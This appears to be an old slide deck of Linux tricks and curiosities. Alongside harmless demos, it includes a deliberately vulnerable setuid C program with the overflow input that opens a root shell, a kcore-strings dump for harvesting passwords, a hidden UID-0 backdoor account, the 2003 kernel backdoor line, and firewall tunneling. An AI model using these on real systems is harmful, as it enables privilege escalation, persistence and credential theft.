NAVIGATING THROUGH THIS PRESENTATION MATERIAL

  • This presentation is made using the S5 presentation system
  • visit http://meyerweb.com/eric/tools/s5/ for more information
  • S5 uses XHTML (content), JavaScript (dynamic aspects) and CSS (layout)
  • Podium is a similar presentation system that uses PHP instead of JavaScript




Fun with GNU/Linux - Play with Tux

Deepan Chakravarthy N

SpikeSource Software Pvt Ltd

codeshepherd AT yahoo DOT com

The Voice of Linux Kernel

This demonstrates how /dev/audio is used by mplayer, xine, xmms and other audio players. These players just convert mp3, avi and other audio file formats to raw audio and copy it to /dev/audio. To hear how your kernel sounds, do the following:

  • $cp  /boot/vmlinuz*   /dev/audio
  • $cp  something.au   /dev/audio
  • $cp  something.wav   /dev/dsp

    A Hole in Computer Brain

    A sample program to gain root access!! (buffer overflow attack)
    #include<stdio.h>
    #include<string.h>
    #include<errno.h>
    #include<unistd.h>
    int main(){
      char command[50],data[10];
      strcpy(command,"/usr/bin/clear");
      gets(data);

      execlp(command,command,NULL);
      printf("%s\n",strerror(errno));
      return 1;
      }
    Compile and execute program (suid-root for the executable).
    $gcc thisprogram.c
    $sudo chown root a.out; sudo chmod u+s a.out;
    $./a.out
    Once you press Enter, the program waits for the user to enter some data. Guess what you should enter to make the program open a bash shell as root?

    "abcdefghijklmnop/bin/bash"
    "xxxxxxxxxxxxxxxx/path/to/command/" in a more general sense, where x is any character.
    For more information google for "Smashing the stack for fun and profit"
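The slide's input works because gets() keeps writing past data and into command. The following is an added example, not part of the original slides, showing the same program with a length-checked read so that command cannot be overwritten; the struct layout, the helper names and the privilege drop are assumptions made for the example.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Same two buffers as the slide, modelled as one struct (assumed layout). */
struct frame { char data[10]; char command[50]; };

/* Read one line into buf without ever writing more than cap bytes.
   Returns 0 on success, -1 on EOF/error, -2 if the line did not fit. */
int read_line_bounded(FILE *in, char *buf, size_t cap)
{
    if (cap == 0 || fgets(buf, (int)cap, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return 0;
    }
    int c = fgetc(in);               /* no newline seen: look at what follows */
    if (c == EOF || c == '\n')
        return 0;                    /* the line fitted exactly */
    while (c != EOF && c != '\n')    /* too long: discard the remainder */
        c = fgetc(in);
    buf[0] = '\0';
    return -2;
}

/* Fill the frame as the slide's program does and return the command that
   would be executed afterwards. */
const char *command_after_input(FILE *in, struct frame *f)
{
    strcpy(f->command, "/usr/bin/clear");
    if (read_line_bounded(in, f->data, sizeof f->data) != 0)
        f->data[0] = '\0';
    return f->command;
}

int main(void)
{
    struct frame f;
    const char *cmd = command_after_input(stdin, &f);
    /* Added hardening (assumption): give up setuid privileges before exec. */
    if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
        return 1;
    execl(cmd, cmd, (char *)NULL);
    printf("%s\n", strerror(errno));
    return 1;
}
```

Fed the 25-character string from the slide, this version rejects the line as too long and still executes /usr/bin/clear.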

    Mental Inside

    This is a computer that speaks to itself. If you have two Ethernet cards in your computer, find a crossover cable and connect the two. Assign IPs to both Ethernet interfaces. Edit the routing table and turn off local routing so that all communication is forced over Ethernet. If you don't have two Ethernet cards, try connecting your USB to Ethernet.
    Crossover cables can be used to connect two computers directly, unlike normal cables which need a router or switch.

    #ifconfig lo down;
    #ping localhost //to check if lo is down
    #ifconfig eth0 192.168.11.1 netmask 255.255.255.0
    #ifconfig eth1 192.168.11.2 netmask 255.255.255.0
    #route add -net 192.168.11.2 netmask 255.255.255.0 gw 192.168.11.2 dev eth0
    #route add -net 192.168.11.1 netmask 255.255.255.0 gw 192.168.11.1 dev eth1
    #ping 192.168.11.1

    Computers in Love

    This is similar to the last experiment. Here two computers speak to each other directly, without a hub or a router. Connect the two computers directly with a crossover cable. Assign IPs to both of them and route as follows.

    #ifconfig eth0 192.168.11.1 netmask 255.255.255.0 //in computer A
    #ifconfig eth0 192.168.11.2 netmask 255.255.255.0 //in computer B
    #route add -net 192.168.11.2 netmask 255.255.255.0 gw 192.168.11.2 dev eth0 //in computer A
    #route add -net 192.168.11.1 netmask 255.255.255.0 gw 192.168.11.1 dev eth0 //in computer B
    #ssh -l username 192.168.11.2 //in computer A

    Beware of kcore

    This demonstrates the use of strings on /proc/kcore. Kcore is a snapshot of your RAM. Strings is a program that extracts all printable characters from a file. When applied to kcore it will extract all printable strings from your RAM, which might include your bank password, Yahoo password, etc.

    #strings /proc/kcore > ~/str.txt

    Creating Pseudo root

    Create a pseudo root account on your machine. The pseudo root user name I chose is usdl. Open the /etc/passwd file. Duplicate the line that corresponds to the root user. Change the user name from root to usdl in the new line. Basically you will be adding a new line that looks like
    usdl:x:0:0:root:/root:/bin/bash
    After this open /etc/shadow and duplicate the line that corresponds to root. Basically add a line like
    usdl:$1$5C.UkdfjsdlfjsdbTBbkIeyMDxqzAO0:13196:0:99999:7:::
    Now the pseudo root user has the same password as root user. Use passwd command to change the pseudo root password.
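An account created this way is a second name for UID 0, which is what an audit should look for. The following added example (not from the original slides) scans passwd-format text for UID 0 entries not named root; the function name and the sample data are constructed for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Scan passwd(5)-format text and collect login names that have UID 0 but are
   not "root". Stores up to max names in out[]; returns the number found.
   Comment lines and lines of 512 bytes or more are skipped. */
size_t find_uid0_aliases(const char *text, char out[][33], size_t max)
{
    size_t found = 0;
    while (*text) {
        size_t len = strcspn(text, "\n");
        char line[512];
        if (len > 0 && len < sizeof line && text[0] != '#') {
            memcpy(line, text, len);
            line[len] = '\0';
            /* Fields: name:password:UID:GID:GECOS:home:shell */
            char *pw = strchr(line, ':');
            char *uid = pw ? strchr(pw + 1, ':') : NULL;
            if (uid != NULL) {
                char *end;
                unsigned long v = strtoul(uid + 1, &end, 10);
                *pw = '\0';              /* line now holds just the name */
                if (end != uid + 1 && *end == ':' && v == 0 && strcmp(line, "root")) {
                    if (found < max)
                        snprintf(out[found], 33, "%s", line);
                    found++;
                }
            }
        }
        text += len + (text[len] == '\n');
    }
    return found;
}

/* Constructed sample, including the duplicated line from the slide. */
static const char SAMPLE_PASSWD[] =
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "usdl:x:0:0:root:/root:/bin/bash\n"
    "alice:x:1000:1000:Alice:/home/alice:/bin/bash\n";

int main(void)
{
    char names[8][33];
    size_t n = find_uid0_aliases(SAMPLE_PASSWD, names, 8);
    for (size_t i = 0; i < n && i < 8; i++)
        puts(names[i]);                  /* each extra UID 0 account */
    return n ? 1 : 0;
}
```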

    Kernel Backdoor

    Here is the most important part of a kernel backdoor attempt from November 2003.

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
    retval = -EINVAL;
    Can you guess what is wrong??

    The if statement should be
    (current->uid == 0)
    and not
    (current->uid = 0)
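The effect of the single '=' is easier to see when both forms are run side by side. This added example (not from the original slides, and not kernel code) models the check in user space; struct task, the OPT_ constants and the function names are stand-ins assumed for the example.

```c
#include <errno.h>
#include <stdio.h>

/* Stand-ins for the kernel names on the slide (assumed, example only). */
#define OPT_WCLONE 0x80000000u
#define OPT_WALL   0x40000000u
struct task { unsigned int uid; };

/* The condition as submitted. '=' stores 0 in uid, and the value of that
   assignment is 0 (false), so the branch is never taken: the caller sees no
   error, only the side effect. Because the assignment sits in its own
   parentheses, gcc's -Wparentheses warning does not fire either. */
int check_backdoored(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (OPT_WCLONE | OPT_WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* The comparison the slide says it should have been. */
int check_intended(const struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (OPT_WCLONE | OPT_WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

/* Run one check for a caller with the given uid; report the uid afterwards. */
unsigned int uid_after(int backdoored, unsigned int uid, unsigned int options)
{
    struct task t = { uid };
    if (backdoored)
        check_backdoored(&t, options);
    else
        check_intended(&t, options);
    return t.uid;
}

int main(void)
{
    unsigned int magic = OPT_WCLONE | OPT_WALL;
    printf("backdoored, magic flags: uid 1000 -> %u\n", uid_after(1, 1000, magic));
    printf("backdoored, other flags: uid 1000 -> %u\n", uid_after(1, 1000, OPT_WALL));
    printf("intended,   magic flags: uid 1000 -> %u\n", uid_after(0, 1000, magic));
    return 0;
}
```

For review and static analysis, the pattern to flag is an assignment inside a condition whose result can never make the branch run.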

    Find if your yahoo buddy is invisible

    This is applicable only to those people who are not behind a proxy server. Find the IP of your yahoo friend from his profile. Run nmap on that ip.
    #nmap ip
    If you find something like
    5101/tcp open admdog
    Then your friend is using yahoo. 5101 is the port used by yahoo messenger.

    http tunneling

    This is for people who are behind a college or corporate firewall (which blocks all ports != 80) and want to connect to the outside world via ports other than 80.
    #hts clientip:22 80 //at home
    #htc 2323 serverip:80 //at college
    #ssh localhost -p 2323 //at college
    The ssh connection to localhost on the client is received by htc at port 2323. htc converts it to HTTP messages and passes them to hts at the server. hts on the server receives these messages at port 80, removes the html tags and passes the data to sshd, which receives it at port 22. The reply from sshd goes back to the client ssh in exactly the reverse manner.

    The DA VINCI CODE



    $echo -e "\107\116\125 \x4C\x69\x6E\x75\x78 \x69\x73 \x6D\x79 \x52\x65\x6C\x69\x67\x69\157\156\012\122\115\123 \151\163 \107\157\144\x0A\114\151\156\x75\x73 \124\157\162\166\141\154\x64\x73 \151\163 \x50\x72\x6F\x70\x68\x65\x74"
    Please find out what this message means.
    The message says
    Linux is my Religion
    RMS is god
    Linus Torvalds is prophet
    Other funny messages!!
    $echo -e "\x61\000\x00\000\x70\000\x72\000\x00\x69\x00\x00\x00\x6C\000\x00\x00 \000\x00\146\x00\000\x00\157\x00\000\x00\157\154\041\x21" //this message has been diluted with null
    $echo -e "\x61\x70\x72\x69\x6C \x66\x6F\x6F\x6C" //pure hex without null
    $echo -e "\141\160\162\151\154 \146\157\157\154" //pure octal without null

    Look at man ascii and man echo for more details. The first echo statement is padded with many NULs (\x00 or \000) to prevent the user from guessing the message.

    Speak in Machine Language

    cat a binary file. It will most probably spoil the bash prompt.
    $cat /bin/true
    $tput reset
    To reset the terminal back to normal mode execute tput reset in the terminal.

    Jukebox

    Create a new runlevel, say 7. Create a folder called rc7.d and put in it a shell script that plays songs. Name it SXXmplayer, where XX is a two-digit number that decides the order in which the startup scripts in the rc folder are executed. Copy the other S* scripts from the rc.d folder that are essential for booting the system with all the resources needed to play music. Edit your grub configuration and create one more entry that goes into runlevel 7 by default.

    Double X Windows


    The Thinking Program

    void think(){think();} int main(){think(); return 0;}